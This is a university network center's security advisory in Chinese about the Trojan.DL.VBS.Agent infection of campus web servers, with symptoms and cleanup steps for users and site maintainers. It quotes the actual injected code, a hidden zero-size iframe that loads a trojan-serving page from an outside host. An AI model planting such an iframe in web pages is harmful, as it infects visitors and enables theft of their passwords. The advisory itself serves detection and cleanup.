首页 中心概况 政策法规 技术服务 校园网络 站内公告 网络资源  
技术服务
 
 
 
 

技术服务 > 防病毒专题 > 具体内容

防范木马病毒,加强网站安全,谈Trojan.DL.VBS.Agent病毒
——谈Trojan.DL.VBS.Agent病毒防范

近期,又一款木马病毒对我校服务器的网站构成了较大的冲击。经过网络中心人员紧张工作,现已初步对病毒进行了控制,现将过程及该病毒的防范方法介绍如下。

病毒症状

访问网站的时候,突然出现机器变慢;新版杀毒软件可以出现如下对话框(以瑞星为例):

网站重新访问,仍然会出现如上情况。

如果没有安装杀毒软件或者没有及时升级,网页可能被导向某个外部网站。系统进程内可发现如“~temp11569”等若干不明进程。

病毒详细说明:

Trojan.DL.VBS.Agent病毒

Trojan.DL.VBS.Agent病毒是由于网友访问的网站服务器上被放置了iframe,指向一个发送木马的网站。其主要问题在服务器,它会使所有来访者遇到可能的威胁。

现在放这些病毒的破坏者只是在网站的主页或conn.asp文件中加入iframe代码,想利用网站,使访问者的浏览器下载他们的恶意代码,然后他们在访问者的机上搞破坏,如偷游戏密码、偷盗QQ号码、盗取网上银行密码等等等。

应对方案:

对普通用户来说,只要安装了先进的杀毒软件,访问这个网站就会报警,报告发现某某病毒,然后杀除病毒。以瑞星为例,需要将病毒库升级到18.51.41以上版本。同时要下载安装最新的IE补丁,建议在网络不拥挤的早上进行可行性的升级。还有,需要用杀毒软件杀除在缓存中的病毒,清空缓存,这样就可以防范这类木马病毒了。木马克星,反间谍专家等木马专杀软件也可以配合已有的杀病毒软件进行工作。

对二级网站用户来说,根据病毒特点,需要仔细进行首页代码的查询,可以发现index.htm或者default.asp,index.asp这类首页文件修改日期为06.10.28,其页面末尾一般有以下代码:

<iframe src="http://www.17hk.com/ziliao/alexa.asp" width="0" height="0" frameborder="0"></iframe>

这就是病毒嵌入的类似广告的插入代码,网页启动时,这个链接网站随即启动,并启动其恶意代码对有IE漏洞的本地用户进行木马植入或者侵害。解决办法就是清除掉它,重新覆盖上传即可。

少数静态网页还可能被嵌入了不明的script代码(实际上也是病毒执行脚本),这也需要有经验的二级网站维护者仔细检查并加以清除。

二级网站用户维护须知

目前,网络中心已将所有home服务器上的二级网站首页做了初步检查,清除了部分嵌入代码,并将服务器进行了适当升级。

网络中心在这里提醒各二级网站维护者,随着当前病毒特别是木马病毒的进展,除了要保证网站内容的安全性外,还要格外注意网站代码的安全性,尤其是套用不明的外部代码的时候,必须保证对源代码进行审查,不公开的代码模块原则上不能采用。再发现带有木马代码的网站,原则上,网络中心将停止其主页发布,取消主页空间。也希望各二级单位积极配合网络中心,对网站进一步做自查工作,以提高网站安全性。

网络中心服务电话:86118001

© 2006 Dalian Medical University Network Center. All rights reserved. Last updated: 2007-10-26